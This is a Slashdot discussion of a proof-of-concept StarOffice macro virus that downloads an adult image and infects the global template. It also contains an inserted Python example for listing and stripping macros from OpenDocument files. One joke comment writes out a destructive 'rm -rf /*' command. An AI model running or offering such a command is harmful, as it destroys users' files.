      Stoned was an old skool virus. This is still a new-fangled macro virus, that doesn't quite feel like a real virus, even though it meets the definition. (And don't get me started on the "email virus" that requires you to open the attachment.)

    13. Re:A Virus by Anonymous Coward · · Score: 0

      Let's see. Won't hurt me. :) ... Hmm.. ..
      Wait a minute. Why is the hd light on? huh? ...
      NO!
      I'll sue you!!!!!!! NOOO!!!!!!!!! STOP!!!

  7. what we all want to know... by joe+155 · · Score: 1

    ... is do you actually get to see the adult content whilst you get infected? it'd make it so much less annoying.

    I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.

    I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure

    --
    *''I can't believe it's not a hyperlink.''
  8. Learning period by suv4x4 · · Score: 4, Insightful

    The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

    It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

    Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.

    1. Re:Learning period by TouchOfRed · · Score: 2, Funny

      Ha. One of these days an offer is going to work, and I'll have free pron and FREE MONEY. Then we'll see who's laughing.

    2. Re:Learning period by aallmighty · · Score: 0

      hopefully with open source products, however, patches will be available much more quickly since anyone could write the patch. in fact, since people tend to be competitive in nature, there will probably be people out there dying for things like this to happen so they can be the l337 programmer to fix it.

    3. Re:Learning period by suv4x4 · · Score: 1

      hopefully with open source products, however, patches will be available much more quickly since anyone could write the patch. in fact, since people tend to be competitive in nature, there will probably be people out there dying for things like this to happen so they can be the l337 programmer to fix it.

      Not so easy, don't forget that the patches have to be reviewed by some central authority (like the guys that started the product? dunno), otherwise it'll be just as easy to sneak in a backdoor or a whole trojan in the patch itself.

    4. Re:Learning period by Anonymous Coward · · Score: 0

      You should notify the Apache crew....

    5. Re:Learning period by aallmighty · · Score: 0

      agreed... but reviewing a patch should surely be quicker than writing it themselves.

    6. Re:Learning period by tapo · · Score: 1

      Here's my problem.

      How will they patch it?

      When the OOo team put out version 2.0.1, the only way I could see to upgrade was to do a full reinstall. Now with Firefox, it was a little annoying downloading 5 MB versions every few weeks, until the 1.5 release came with a good autoupdate system.

      OpenOffice is what, 80-90 MB? There is no way I can download something that size - especially on dialup - just to fix a single security issue. The OOo team needs to invest in a decent, enterprise-grade network patching system ASAP.

      --
      "Joy is contagious," he said, peering into the microscope.
    7. Re:Learning period by msuarezalvarez · · Score: 2, Insightful

      I am quite sure they'll be quite happy to hear about your donation of time/money/whatever.

    8. Re:Learning period by realnowhereman · · Score: 1

      80-90MB? Not if you use a decent distribution that has modularised the binaries:

      $ apt-cache show openoffice.org-writer
      Package: openoffice.org-writer
      Installed-Size: 10944
      Version: 2.0.2-3
      Size: 4945590


      5 MB download, 10 MB install. Not that painful really.

      --
      Carpe Daemon
  9. viral threat... by Anonymous Coward · · Score: 0

    people scared by threat: 3
    people who don't care and want to see the adult content: 423221

    (someone had to say it)

  10. POC != virus by Anonymous Coward · · Score: 2, Insightful


    proof of concept is not a virus, sure it could be, but until it's in the wild it's not really

    1. Re:POC != virus by Anonymous Coward · · Score: 0
      Who wants McAfee, Symantec or OneCare to phone-home about something on your machine that heuristics got 'curious' about?
      Should it show up next week on everyones radar ... do you really want that initial information forwarded to "proper authorities"?

      Get a Windows antivirus product version that runs fine if fully blocked by firewall rules, and can be simply and manually updated!

      --
      Just say NO to software subscriptions
      Just say NO to paying for time-bombs.
      Just say NO to cripple-ware software.

  11. Why go through the trouble? by MagicM · · Score: 3, Interesting

    If you want to trick someone into viewing an image, why not just embed the image in the document?

    Where is the "proof" (and the "virus") in this "proof of concept virus"?

    1. Re:Why go through the trouble? by sidfaiwu · · Score: 3, Insightful

      The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.

    2. Re:Why go through the trouble? by CastrTroy · · Score: 2, Insightful

      Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.

      --

      Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    3. Re:Why go through the trouble? by BasilBrush · · Score: 2, Informative

      No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or its links.

    4. Re:Why go through the trouble? by sidfaiwu · · Score: 1

      I see your point. I guess that the 'proof' would require demonstration that the code can be replaced with something malicious. I suppose the creators decided that downloading unexpected content from the web sufficiently demonstrates this.

  12. Bypass mechanism by 16K+Ram+Pack · · Score: 3, Insightful
    Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

    I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

    1. Re:Bypass mechanism by Anonymous Coward · · Score: 0

      Isn't that where the computer industry is moving towards? Security from viruses. Security from spyware. Security from music theft. Security from movie theft....

    2. Re:Bypass mechanism by DragonWriter · · Score: 1
      Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.


      Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.

    3. Re:Bypass mechanism by Steve001 · · Score: 1

      I'm a StarOffice 8 user. In response to this thread I opened up StarOffice to see what the default macro settings are. I've not changed them since installing StarOffice so it should be set to the default.

      Checking Macro Security (under Tools - Options - StarOffice - Security - Macro Security...) it was set for Medium. Medium requires manual confirmation before executing macros from untrusted sources. I checked my trusted sources list and found none listed.

      This indicates to me that with my macro security set to medium a macro will not run unless I choose to run it. Unless I am wrong, only people who set Macro Security to Low (indicated as Not Recommended) would be endangered from incoming macros since they would run without confirmation.

  13. Nice! by derxob · · Score: 2

    "It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content..

    --
    Beat the computer, program your life.
    1. Re:Nice! by joe+155 · · Score: 1

      "but imagine what could potentially be used in place of the adult content.."

      It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n

      --
      *''I can't believe it's not a hyperlink.''
    2. Re:Nice! by gewalker · · Score: 1

      Hmm, maybe I need to start using Star Office after all.

  14. Bad terminology. Not a virus. by mark-t · · Score: 1
    To qualify as a virus, it must be capable of propagating somehow, yet there is nothing in the article that indicates that it could be adapted to do this.

    This so-called virus, therefore, is just a trojan.

  15. Proof of Concept to infect the planet by packetmon · · Score: 4, Interesting

    I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

    In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

    Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

    Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

    1. Re:Proof of Concept to infect the planet by Anonymous Coward · · Score: 0

      Wow! Go blow your horn somewhere else... or better yet, get a job - it looks like you got way too much time on your hands.

    2. Re:Proof of Concept to infect the planet by Anonymous Coward · · Score: 0

      Multicast doesn't work across the interwebs like you read about in your ccnp books. The multicast ranges are not typically used when transiting multiple ASs.

    3. Re:Proof of Concept to infect the planet by killmenow · · Score: 2, Informative
      The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.
      The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assuming most people (even here, on slashdot, where all the geeks are) don't know what multicast is...because it's not in widescale use. From Wikipedia: "In order to prevent conflicts (where two groups have the same group IP) most routers will not forward multicast messages onto other network segments. This behaviour is, however, sometimes configurable on a case-by-case basis (it depends on the router software)."

      And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability. Also from Wikipedia: "Multicast security is a major issue. Standard, practical, communications security solutions normally employ symmetric cryptography. But applying that to IP Multicast traffic would enable any of the receivers to pose as the sender. This is clearly unacceptable. The IETF MSEC workgroup is developing security protocols to solve this problem, mostly within the architectural framework of the IPsec protocol suite.

      IPsec cannot be used in the multicast scenario because IPsec security associations are bound to two hosts and not many. IETF proposed a new protocol TESLA, which is quite convincing and flexible for multicast security."
    4. Re:Proof of Concept to infect the planet by Salsaman · · Score: 1
      Will be strange to see what else comes out of this.

      Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.

    5. Re:Proof of Concept to infect the planet by flooey · · Score: 1

      And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability.

      The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.

      If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're liable for 1 packet worth of bandwidth, 20 packets worth of bandwidth, or somewhere in between.

      Even more complicated, suppose you send 1 packet to your tier 2 ISP, they end up sending 20 packets to their tier 1 ISP, and the tier 1 ISP ends up sending 100 packets out from there, which turns into 1000 packets delivered to end users, who gets billed how much? If the tier 1 ISP charges the tier 2 ISP for 100 packets, can they pass that on to you? Is it even possible for them to do that, since they don't necessarily even know how many packets the tier 1 ISP ended up sending or billing them for? The tier 1 ISP isn't about to send them a packet-by-packet breakdown of their bill.

      It's a sticky problem that ISPs apparently just don't want to deal with.

    6. Re:Proof of Concept to infect the planet by Anonymous Coward · · Score: 0
      "Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST"

      Uhh, or you could have just said:
      "If Attacker spoofs Disney sending bad data to Multicast_Address' Destination..."... Or to put it in your lingo:

      Let O=Original_Poster P=Pompous_Ass... oh you get the idea...

  16. No malicious code by Duds · · Score: 2, Insightful

    If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.

  17. Erh... no, boss, erh... no, that wasn't me by Opportunist · · Score: 4, Funny

    Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

    A heartfelt THANK YOU to the author!

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    1. Re:Erh... no, boss, erh... no, that wasn't me by Comatose51 · · Score: 1

      You're quite the opportunist...

      --
      EvilCON - Made Famous by /.
    2. Re:Erh... no, boss, erh... no, that wasn't me by Anonymous Coward · · Score: 0

      just don't ask to shake hands...

  18. Re:Bad terminology. Not a virus. by Duds · · Score: 1

    Get used to it. 99.9999% of windows "viruses" are just people dumb enough to go "OOOH LOOK IT SAYS IT'S A SCREENSAVER OF PONNIES!" rather than you know, viruses.

  19. MOD PARENT UP by Anonymous Coward · · Score: 0

    Couldn't agree more. There are some people in this world who need to be fed through Saddam's plastic shredder feet first.

  20. Thanks! by Chris+Bradshaw · · Score: 3, Funny
    "proof-of-concept"

    Cool... Thanks for the idea!

    Respectfully Signed,
    Anonymous Redmond Washington Resident

    --
    Get your Windows Malicious Software Removal Tool Here for FREE! - http://fedora.redhat.com
  21. Not Really by everphilski · · Score: 0

    Star still has security through obscurity.

    Not really. The virus writers have access to the source code. If they wanted to go deeper than macro viruses.

  22. Re:Bad terminology. Not a virus. by gmiley · · Score: 1

    While you are technically correct, the author of this did not want to provide self-propagating attributes to it. That would take it more out of the realm of Proof-of-Concept and place it as an actual virus or worm. Anyone with any type of macro, scripting, programming skills could add a simple email routine and/or with a bit more skill scan for open network drives and copy itself out, etc...

    The fact that it can run script on a client machine once a user opens the document is the entire point of the "virus".

    So back to what I was originally saying, this is, as you said, not a "virus". It is a "Proof-of-Concept Virus" however.

  23. Losing data is always the real problem. by khasim · · Score: 3, Informative

    If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

    It's always about the security of the data.

    Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

    When all that is in danger is your personal home directory, that's really as good as the OS can be.

    If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.

    1. Re:Losing data is always the real problem. by xtracto · · Score: 1

      It's always about the security of the data.

      No, as GP said, the security of Information is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

      --
      Ubuntu is an African word meaning 'I can't configure Debian'
    2. Re:Losing data is always the real problem. by Nutria · · Score: 1
      If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

      Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your account has Administrator privs), and me on Linux, logged in as "ron", who doesn't have root privs.

      How do we recover?

      You must reinstall WinXP and every application, then all data. Much time (2 weeknights, or a long Saturday) and aggravation is expended.

      I, OTOH, create a ron2 account, and log in to the GUI under that account, and, while reading /., open an xterm, "su -", and restore the "ron" files from my external HDD. No problems.


      --
      "I don't know, therefore Aliens" Wafflebox1
  24. "Announcement" unconnected to Kaspersky's products? by whoever57 · · Score: 1

    I am sure that this announcement has nothing whatsoever to do with the fact that Kaspersky sells virus checkers for Linux.

    Kaspersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.

    --
    The real "Libtards" are the Libertarians!
  25. Macro copying by hackwrench · · Score: 1

    The key element of a virus is that it copies itself. What is the purpose of having a macro copy itself without user intervention?

  26. OpenOffice too! by levell · · Score: 2, Informative

    Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice

    --
    Struggling to find a day everyone can make? WhenShallWe.com
  27. Yawn by jofi · · Score: 2, Interesting

    So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

    --
    Blame the user, not the software.
  28. Downloads "adult" content... by locokamil · · Score: 0, Redundant

    This thing downloads adult content and displays it. And this is a bad thing for us dorks because...

  29. Proof of security by MobyDisk · · Score: 2, Insightful

    This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.

  30. Is this really a virus? by xutopia · · Score: 3, Insightful

    Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

    1. Re:Is this really a virus? by Compholio · · Score: 1

      Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

      It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.

    2. Re:Is this really a virus? by xutopia · · Score: 1

      Well macro viruses from the original definition do exist. Many of them would launch when opening a word file, infect all other word files on the computer and send an attachment to everyone in the address book. Of course these only work on MS Office.

  31. hm.. by DoctorDyna · · Score: 2, Informative
    It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

    Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.

    --
    Windows has more viruses because linux has more virus coders.
    1. Re:hm.. by nstlgc · · Score: 1

      It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."
      Congratulations. That's what it means indeed.

      --
      I'm Rocco. I'm the +5 Funny man.
    2. Re:hm.. by DragonWriter · · Score: 1
      Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.


      OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.

      So it's not really a "proof of concept" as regards that particular capacity at all. The fact that it doesn't show that you can't do it is meaningless, that tells you nothing you didn't know without the so-called "proof of concept".
    3. Re:hm.. by The+Cisco+Kid · · Score: 1

      Of course, because after all everyone runs StarOffice as a user that has direct write access to their /dev/hdX nodes. Just because you are a Windows user that doesn't understand the concept of separation of privilege because MS never bothered, doesn't mean that it doesn't exist. (Er, that's of course assuming you aren't running StarOffice on a Windows system, in which case the vulnerability is an MS one anyway)

  32. goatse by EccentricAnomaly · · Score: 5, Funny

    What? No link to the "adult content?"

    be careful what you wish for... the 'adult content' could be goatse

    --
    There are 10 types of people in this world, those who can count in binary and those who can't.
  33. No need to worry by sootman · · Score: 4, Funny

    Both StarOffice users have been contacted and were warned to be careful.

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
    1. Re:No need to worry by HaydnH · · Score: 1

      Graboid (975267) on Thursday June 01, @05:14PM - Modded -1 Flamebait:

      "To both users of Open Office. I'll bet they're shaking in their boots!"


      sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:

      "Both StarOffice users have been contacted and were warned to be careful."


      /. moderation at its finest there! Surely the second post should also have been flamebait or at least redundant? Oh wait... one's talking about OOo - must protect our open source masters!!

      --
      Time is an illusion. Lunchtime doubly so. - Douglas Adams
  34. This news is 2 days old!! by Anonymous Coward · · Score: 0

    It's sad to see that Slashdot is becoming irrelevant... this same news article was posted on other news websites up to two days earlier, but Slashdot prefers to link to the CNet article only. Other submissions on the same topic are rejected outright. Bias? Nah... haha it's just moderator preferences that are making competitor sites like Digg grow and Slashdot stay static because it too often now has older, less-timely links.

    1. Re:This news is 2 days old!! by Anonymous Coward · · Score: 0

      Heh, I was going to suggest that instead of "from the batten-down-the-hatches-maties dept." they put "from the better-late-than-never dept.".

      Ironically this will be cause enough for people to stick with MS Office, though god knows why, given the number of exploits it's had over the years.

  35. Re:Bad terminology. Not a virus. by Aim+Here · · Score: 1

    But when you execute that screensaver, it emails itself to other dumb windows users. Does this supposed OpenOffice 'virus' have any form of replication, human-assisted or otherwise? Without some form of replication, this is less of a virus than some Unix shell script that reads something like:

    rm -rf /* #This virus uses the honour system. Please email this to all your friends before executing as root

  36. The "proof of concept" by DragonWriter · · Score: 1

    That it infects the global template when opened from a document file is the actual "proof of concept" here, and if it really doesn't require user intervention, in the default configuration of StarOffice or OOo, to (1) allow macros to run, and (2) allow a macro running in one document to affect the global template, then there is a real, though I would suspect fairly simple to fix, problem; document macros need to run, by default, in a more tightly-restricted sandbox than that.

    1. Re:The "proof of concept" by Anonymous Coward · · Score: 0

      If that is true, I'd have to agree. But the press release doesn't say anything about that, it only says it's a document that (downloads and) displays a picture.

      And yes, documents should not be able to change a template, that would be a bug (Feature in MS-speak, let's see how Sun are going to categorize it).

  37. Re:Bad terminology. Not a virus. by DragonWriter · · Score: 1
    The fact that it can run script on a client machine once a user opens the document is the entire point of the "virus".


    Any document format with a scripting facility provides the capacity to run a script on the client machine when a user opens a document. If that's all it takes to have a "virus", then every macro is a "virus".
  38. Whoosh! by phantomfive · · Score: 1

    And that whooshing sound you just heard was a veiled goatse reference flying over your head.

    --
    Qxe4
  39. Where can I get StarOffice? by Lethu · · Score: 1

    ...and the virus also.

  40. Further proof by HumanisticJones · · Score: 1

    It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

    So I guess this is just further proof that the internet is indeed for porn.

  41. macros are easy to remove for OOo files by athena_asamiya · · Score: 1

    Star Office and OpenOffice files are not like Microsoft Office files anyhow, they are zipped up xml files in folders. So it's possible to view or remove all macros without loading them into OOo or having a special tool. They aren't mixed in with some secret format.
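
The approach in the comment above (inspecting the zip package directly), as an added example that is not part of the thread or of either office suite's code. It assumes macro libraries live under `Basic/` and `Scripts/` in the package and are listed as self-closing entries in `META-INF/manifest.xml`; the sample document is constructed.

```python
import io
import re
import zipfile

MACRO_DIRS = ("Basic/", "Scripts/")  # assumption: where the package keeps macro libraries
ENTRY_RE = re.compile(
    rb'\s*<manifest:file-entry\b[^>]*manifest:full-path="(?:Basic|Scripts)/[^"]*"[^>]*/>')

def list_macros(doc: bytes) -> list[str]:
    """Return macro-related member names without opening the file in the office suite."""
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        return [n for n in z.namelist() if n.startswith(MACRO_DIRS)]

def strip_macros(doc: bytes) -> bytes:
    """Copy the package, dropping macro members and their manifest entries."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(doc)) as zin, zipfile.ZipFile(out, "w") as zout:
        for info in zin.infolist():          # keeps order, so 'mimetype' stays first
            if info.filename.startswith(MACRO_DIRS):
                continue
            data = zin.read(info)
            if info.filename == "META-INF/manifest.xml":
                data = ENTRY_RE.sub(b"", data)
            zout.writestr(info, data)        # reuses each member's compression method
    return out.getvalue()

def make_sample() -> bytes:
    """Constructed sample package; the macro body is a harmless MsgBox."""
    manifest = b"""<?xml version="1.0"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0">
 <manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text" manifest:full-path="/"/>
 <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="content.xml"/>
 <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/Standard/Module1.xml"/>
 <manifest:file-entry manifest:media-type="text/xml" manifest:full-path="Basic/script-lc.xml"/>
</manifest:manifest>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text", zipfile.ZIP_STORED)
        z.writestr("content.xml", "<office:document-content/>")
        z.writestr("Basic/Standard/Module1.xml", 'Sub Main : MsgBox "hi" : End Sub')
        z.writestr("Basic/script-lc.xml", "<library:libraries/>")
        z.writestr("META-INF/manifest.xml", manifest)
    return buf.getvalue()

if __name__ == "__main__":
    sample = make_sample()
    print("macro members:", list_macros(sample))
    print("after strip:  ", list_macros(strip_macros(sample)))
```

This only handles macro storage at the package level; anything inside `content.xml` that refers to a removed macro is left untouched.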

  42. No, it's not. by CarpetShark · · Score: 1

    Losing $HOME, for anyone who cares about their data enough anyway, means restoring from backup (ie, somewhere outside $HOME, even if it's just in another dir). If something outside $HOME is compromised though, then that user has risked many other systems and users; not just himself. In doing so, he made the 'net more difficult to police, and exposed himself to future troubles. We're all connected now.

  43. Not my frozen bubble scores!!!!!!1 by ElleyKitten · · Score: 1

    Oh my God! *runs off to backup high score file*

    --
    "What is Internet Explorer 7? Are you saying we can't access the normal internet?" - I love tech support. Really.
  44. Re:Bad terminology. Not a virus. by Mister+Whirly · · Score: 1

    Some call it Darwinism at work, I call it Job Security (TM)...

    --
    "But this one goes to 11!"
  45. Re:Bad terminology. Not a virus. by Duds · · Score: 1

    True (and I'm so tempted to see if a windows version of your example would actually work) but the point is you'll have to live with all malicious code being called a virus because the great unwashed doesn't know any different.

  46. It's just a proof of concept.. by Psyx · · Score: 1

    until someone loses an eye.

  47. Re:Bad terminology. Not a virus. by gmiley · · Score: 1

    Potentially, yes. It also needs to be able to operate outside of its containing application, such as retrieving and loading external content without the approval of the user.

  48. Which just goes to prove by The+Cisco+Kid · · Score: 1


    That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collaborating with that person to co-produce that document, and you have agreed in advance to use that specific format.

    And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

    Oh, and if your document isn't of sufficient size or importance to do it that way - it probably doesn't need fancy fonts and formatting anyway.

    1. Re:Which just goes to prove by DragonWriter · · Score: 1

      And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

      Good luck convincing people to give up Word for TeX, sensible as your idea is.

  49. Meet my mother by atrocious+cowpat · · Score: 2, Interesting
    "I don't, nor do I know anyone that does, back up their /home folder daily."
    My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a separate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

    It may seem like overkill, but I set things up this way not because I'm scared of the havoc a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

    I sleep well, she can do whatever she wants, and everyone is happy.
    --
    sig? Oh, that sig...
  50. Can they execute arbitrary code? by anubi · · Score: 1
    If they cannot execute arbitrary code, or retrieve hidden snippets of info from me, then I cannot get too antsy.

    I can see where there could be a legitimate need to display an image from the web.

    And whatever can be done, can be done poorly, as how could I expect the software to censor a pornographic image when it doesn't even know what one is?

    It's the ability to execute arbitrary code or snoop that concerns me. These lead to identity theft, keyloggers, and kernel mode rootkits.

    One who remains ignorant of STD's is apt to get one.

    One who doesn't know how his machine works is apt to lose control of it.

    Knowledge is what open source is all about - and why we can talk of security issues freely so it does not become a problem.

    In an ideal world, letting someone know they have a security problem should rank about the same seriousness as advising a friend he forgot to zip up after a nature call.

    This bird flu thing going around is a problem only because we don't know exactly how it works. If we did, we could easily sidestep it.

    It never ceases to amaze me businesses tolerate the enforced ignorance paradigm that keeps putting us all at risk.

    --
    "Prove all things; hold fast that which is good." [KJV: I Thessalonians 5:21]

  51. Re:Oh no - big threat!! by Anonymous Coward · · Score: 0

    (Ok, just kidding, they're probably up to 10 actual users by now). Of course, the user that reads binary and the one that can't.

  52. where's the virus? by lon3st4r · · Score: 1
    Ok fine. So this macro can download an image and open it in another new document. But any legit macro should also be able to do that (I mean, just refer to a web image in a new document, and you're done).

    What this guy has is a doc which has a macro embedded in it. And all you get is an execution of that macro when you open the doc.

    Where are the *real* characteristics of a virus - spreading to other files on the disk?

    * lon3st4r *

  53. Virus Spreading Problem... by fprog26 · · Score: 1

    The problem may not really be the "payload" as in deleting $HOME,
    which would be annoying or disrupting if you don't rsync, tar or backup it.

    But the fact that someone could maybe abuse it, and start "replicating"
    by sending itself via sendmail or whatever or replicating to all your OO.org documents.
    Think I LOVE YOU virus or similar or maybe I'm just too outlook oriented.

    What's more stupid is that a script kiddy would simply take this proof, take some word/excel virus and simply adapt it...

    I think it is stupid to provide such insecure macro thingy; moreover, displaying a proof of concept to everyone,
    before a CERT is released to the OO.org developer or similar...

    Just my 2 cents.

    1. Re:Virus Spreading Problem... by Nutria · · Score: 1
      start "replicating" by sending itself via sendmail

      It would be useful to know whether OOo BASIC can get out of the OOo sandbox and access the live system.

      --
      "I don't know, therefore Aliens" Wafflebox1
  54. Actual details on virus by khanyisa · · Score: 1
    The article itself is light on details, which they promise to write up in their Virus Encyclopedia but apparently haven't yet.
    TechWack has more though (without quoting a source):
    Antivirus firm Kaspersky is calling the virus "Stardust". This virus is basically contained in a StarOffice document that uses macros and then infects a global template, which is used by the application to generate new documents. If a victim opens the file carrying this virus, Stardust copies it into the global template and all contained in a StarOffice document that uses macros and then infects a global template gets infected by it used by that copy of the software.
    1. Re:Actual details on virus by khanyisa · · Score: 1

      Just found the entry in the Virus Encyclopedia here: http://www.viruslist.com/en/viruses/encyclopedia?virusid=123066 (although it hasn't been updated yet)

  55. Re:Agile Virus Writers? by callistra.moonshadow · · Score: 1

    I like the description of "A proof of concept virus." I guess virus writers are using the Agile Methodology. j/k

    --
    --Cally
  56. Re:Bad terminology. Not a virus. by Anonymous Coward · · Score: 0

    and I'm so tempted to see if a windows version of your example would actually work

    It does, there are several examples in the wild. Usually they say something like "OMG, I just found a virus on my system and it might have spread to everyone in my address book. If you have (name of Windows system file) in C:\WINDOWS\SYSTEM32, delete it immediately and forward this warning to all your contacts".

    And yes, the moron I got it from had already deleted the system file. Luckily not one of the files needed to boot the system though.

  57. definition of virus by tod_miller · · Score: 1

    3 telltale signs microsoft commissioned this: They want to start getting people's imaginations onto damaging the name of staroffice.

    1) adult file: yikes! imagine if it had loaded a normal image, nothing for representatives to get upset about then is there
    2) This isn't even a virus, how lame
    3) It is microsoft, come on

    While it is a nuisance, it isn't a virus. It doesn't replicate. It isn't a worm or trojan.

    It doesn't exploit anything.

    In fact, isn't it useful to have remote hosted files open in documents if you decide you want them? Isn't that a legitimate use of star basic?

    If you allow it.

    Nothing to see here people, especially if they used goatse as the adult image.

    If it was some cute amateur, then send me the virus now!

    After years of falling for 'Anna Kournikova' and the like, finally a virus that mans up and gives us what we want.

    please type the word in this image: FuckBill
    verification text - if you are visually impaired, please email us at pater@slashdot.org

    --
